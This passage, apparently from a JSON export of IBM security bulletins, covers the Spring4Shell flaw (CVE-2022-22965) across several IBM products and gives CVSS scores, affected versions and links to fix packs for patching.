)\n\n[sym-7.3-build601128](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601128&includeSupersedes=0> \"sym-7.3-build601128\" )\n\n[sym-7.3-build601137](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601137&includeSupersedes=0> \"sym-7.3-build601137\" )\n\n[sym-7.3-build601138](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601138&includeSupersedes=0> \"sym-7.3-build601138\" )\n\n[sym-7.3-build601161](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601161&includeSupersedes=0> \"sym-7.3-build601161\" )\n\n[sym-7.3-build601162](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601162&includeSupersedes=0> \"sym-7.3-build601162\" ) \n \nIBM Spectrum Symphony| 7.3.1| \n\nP104630\n\nP104643\n\nP104644\n\nP104645\n\nP104649\n\nP104650\n\n| \n\n[sym-7.3.1-build601108](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601108&includeSupersedes=0> \"sym-7.3.1-build601108\" )\n\n[sym-7.3.1-build601120](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601120&includeSupersedes=0> \"sym-7.3.1-build601120\" )\n\n[sym-7.3.1-build601122](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601122&includeSupersedes=0> \"sym-7.3.1-build601122\" )\n\n[sym-7.3.1-build601124](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601124&includeSupersedes=0> \"sym-7.3.1-build601124\" )\n\n[sym-7.3.1-build601125](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601125&includeSupersedes=0> \"sym-7.3.1-build601125\" )\n\n[sym-7.3.1-build601126](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601126&includeSupersedes=0> \"sym-7.3.1-build601126\" ) \n \nIBM Spectrum Symphony| 7.3.2| \n\nP104634\n\nP104654\n\nP104670\n\nP104671\n\nP104678\n\nP104679\n\n| \n\n[sym-7.3.2-build601111](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601111&includeSupersedes=0> \"sym-7.3.2-build601111\" )\n\n[sym-7.3.2-build601143](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601143&includeSupersedes=0> \"sym-7.3.2-build601143\" )\n\n[sym-7.3.2-build601154](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601154&includeSupersedes=0> \"sym-7.3.2-build601154\" )\n\n[sym-7.3.2-build601155](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601155&includeSupersedes=0> \"sym-7.3.2-build601155\" )\n\n[sym-7.3.2-build601164](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601164&includeSupersedes=0> \"sym-7.3.2-build601164\" )\n\n[sym-7.3.2-build601165](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601165&includeSupersedes=0> \"sym-7.3.2-build601165\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T03:16:58", "type": "ibm", "title": "Security Bulletin: IBM Spectrum Symphony is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-20T03:16:58", "id": "E7653A5862D76B5A32167F623532FE5567AFABF9A426F06C2CBA21BE4039657F", "href": "https://www.ibm.com/support/pages/node/6596873", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:49", "description": "## Summary\n\nIBM Watson Knowledge Catalog in Cloud Pak for Data is potentially vulnerable to arbitrary code execution due to Java Spring data binding vulnerability (CVE-2022-22965).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Knowledge Catalog on-prem| 3.5.1 \nIBM Watson Knowledge Catalog on-prem| 4.0 \n \n\n\n## Remediation/Fixes\n\n** IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nInstall Watson Knowledge Catalog 4.0.8 (Refresh 8) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=new-watson-knowledge-catalog>\n\nInstall Watson Knowledge Catalog 3.5.10 (Refresh 13) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=new-watson-knowledge-catalog>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T16:01:59", "type": "ibm", "title": "Security Bulletin: Java Spring vulnerability impacts IBM Watson Knowledge Catalog in Cloud Pak for Data (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-06T16:01:59", "id": "D9E06E5C382B357DD50008C0D277DB7D1B6D088C158C56C3D022303F1DFC00A4", "href": "https://www.ibm.com/support/pages/node/6583465", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:33", "description": "## Summary\n\nIBM Sterling Connect:Direct for Microsoft Windows is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring 2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect:Direct for Microsoft Windows| 6.2.0.0 - 6.2.0.3_iFix012 \n \n\n\n## Remediation/Fixes \n \n--- \nIBM recommends addressing the possible vulnerability now by upgrading. **Affected Product(s)**| **Version(s)**| **APAR \n**| **Remediation / First Fix \n** \n---|---|---|--- \nIBM Sterling Connect:Direct for Microsoft Windows| 6.2| None| Apply [6.2.0.4](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%20software&product=ibm/Other+software/Sterling+Connect%3ADirect+for+Microsoft+Windows&release=6.2.0.4&platform=All&function=fixId&fixids=6.2.*.*-IBMConnectDirectforMicrosoftWindows-x64-fp*> \"6.2.0.4\" ), available on Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T12:12:42", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct for Microsoft Windows is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-11T12:12:42", "id": "9559CE1CF845BE27801B9A76018F0E7FFBD3159BCFFEE9D25526E6D24FA5F367", "href": "https://www.ibm.com/support/pages/node/6584984", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:29:07", "description": "## Summary\n\nIBM Sterling B2B Integrator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in the web application. Updated Spring library will be shipped in upcoming fix pack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation/Fix \n** \n---|---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1| We have released 6.1.2.0 with non-vulnerable spring framework jars that can be downloaded from Passport Advantage \n \n## Workarounds and Mitigations\n\nIBM Sterling B2B Integrator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Out of an abundance of caution, we will upgrade Spring Framework in our future release.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T20:07:31", "type": "ibm", "title": "Security Bulletin: IBM Sterling B2B Integrator is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-08-03T20:07:31", "id": "8F4CAEB4814182DEBFBE7DFCA9FC13E3577204C307181835FA0E1CA012CAD9E1", "href": "https://www.ibm.com/support/pages/node/6570975", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:07:43", "description": "## Summary\n\nIBM Cognos Command Center is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Cognos Command Center as a direct dependency of ActiveMQ. IBM Cognos Command Center 10.2.4.1 has upgraded to ActiveMQ 5.17.1 which uses Spring 5.3.19. ActiveMQ 5.17.1 requires Java 11 as a minimum version, therefore IBM Cognos Command Center has upgraded to IBM\u00ae Semeru JRE 11.0.14.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Command Center 10.2.4.1\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security update:\n\n[IBM Cognos Command Center 10.2.4 Fix Pack 1 IF16](<https://www.ibm.com/support/pages/node/6890671>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-01T20:05:48", "type": "ibm", "title": "Security Bulletin: IBM Cognos Command Center is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-03-01T20:05:48", "id": "A871939B5F51CA69B0EDBC21D1816A26D5E84C73FB45D47DF354F899F5F6BB9B", "href": "https://www.ibm.com/support/pages/node/6590487", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:09", "description": "## Summary\n\nIBM Planning Analytics Workspace is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Planning Analytics Workspace in Server Side Rest APIs as an indirect dependency by MongoDB that is used to store content. IBM Planning Analytics Workspace includes Spring 5.2.20. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Planning Analytics Workspace 2.0\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security updates:\n\n[Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central](<https://www.ibm.com/support/pages/node/6584994> \"Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central\" ) \n \n\n\nThis Security Bulletin is applicable to IBM Planning Analytics 2.0 on premise offerings. This has been addressed on IBM Planning Analytics with Watson and no further action is required.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-17T16:21:25", "type": "ibm", "title": "Security Bulletin: IBM Planning Analytics Workspace is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-17T16:21:25", "id": "E0AC0F2CEF0686FD5D35D040E442195982E92EF98BDFD841F5F62D37D0337B68", "href": "https://www.ibm.com/support/pages/node/6586658", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:52", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its developement infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pack for Data| 1.5.0, 4.0.0. 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T07:36:23", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T07:36:23", "id": "DD71E3BE311976CFF7FE89F0916C7047300E0A1E779B1D8D85CA991081F0FBC3", "href": "https://www.ibm.com/support/pages/node/6581969", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:03", "description": "## Summary\n\nIBM InfoSphere Information Server is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in our Rest apis, application deployment inside containers. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Information Server, \nInformation Server on Cloud| 11.7 \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nInfoSphere Information Server, InfoSphere Information Server on Cloud| 11.7| [JR64760](<http://www.ibm.com/support/docview.wss?uid=swg1JR64760> \"JR64760\" )| \\--Apply IBM InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/pages/node/878310>) \n\\--Apply IBM InfoSphere Information Server version [11.7.1.3](<https://www.ibm.com/support/pages/node/6498109> \"11.7.1.3\" ) \n\\--Apply Information Server [11.7.1.3 Service pack 4](<https://www.ibm.com/support/pages/node/6568469> 